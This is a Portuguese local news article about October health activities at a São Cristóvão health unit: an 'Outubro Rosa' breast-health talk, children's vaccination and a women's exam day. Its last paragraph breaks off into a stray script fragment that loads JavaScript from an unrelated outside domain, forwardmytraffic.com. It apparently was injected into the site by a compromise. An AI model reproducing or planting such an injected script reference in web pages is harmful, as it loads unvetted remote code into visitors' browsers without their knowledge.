InícioDestaqueUnidade de saúde Ailton Mendes (Posto Amarelo) terá ações pela campanha Outubro...

Unidade de saúde Ailton Mendes (Posto Amarelo) terá ações pela campanha Outubro Rosa e Dia das Crianças

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

 

A importância da prevenção e do diagnóstico precoce do câncer de mama e de colo de útero irá pautar grande parte das atividades realizadas, neste mês de outubro, pela equipe do programa Estratégia Saúde da Família (ESF) 006 e que atua na Unidade Básica de Saúde Ailton Mendes (Posto Amarelo), no distrito de São Cristóvão.

 

 

Neste domingo (21), a enfermeira Cristiane Hoffmann Lechinheski vai ministrar palestra sobre o tema “Outubro Rosa – Saúde da Mulher”. O evento acontece às 14h30 na igreja Projeto Refúgio Cristão.

 

 

A programação da próxima quinta-feira (25) é toda voltada ao público infantil, pela passagem do Dia das Crianças, em 12 de outubro.

 

 

Das 09h às 111h30 e das 13h às 16h haverá vacinação e atualização da caderneta vacinal, pesagem das crianças entre 0 e 5 anos de idade, além da avaliação do peso, altura e idade dos pequenos, com o acompanhamento da nutricionista Tatiane e da enfermeira Cristiane.

 

 

Já no sábado (27), a unidade de saúde estará aberta exclusivamente às mulheres residentes na área de ESF 006, com diversos serviços de saúde. Estão previstas orientações e atendimentos do médico Giuliano Brandes. Mulheres de 50 anos ou mais, inclusive, poderão solicitar exames de mamografia.

 

 

Serão realizados exames papanicolau (preventivo) e clínicos das mamas, sob a supervisão da médica ginecologista Maria Luiza. Também serão oferecidos testes rápidos de HIV, Sífilis e Hepatites B e C; avaliação nutricional; atendimento pela assistente social Cleonice, para verificação do cartão SUS; como também a aferição da pressão arterial e glicemia.

 

 

No espaço da beleza, a mulherada poderá mudar o visual com novos penteados e maquiagens feitas gratuitamente pela cabeleireira Elizete e maquiadora Thalia.

 

 

Estão ainda no cronograma de ações, para este dia, a apresentação de dança pelos pacientes do Centro de Atenção Psicossocial (Caps) e o sorteio de brindes doados pelo comércio local e por funcionários da unidade de saúde…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.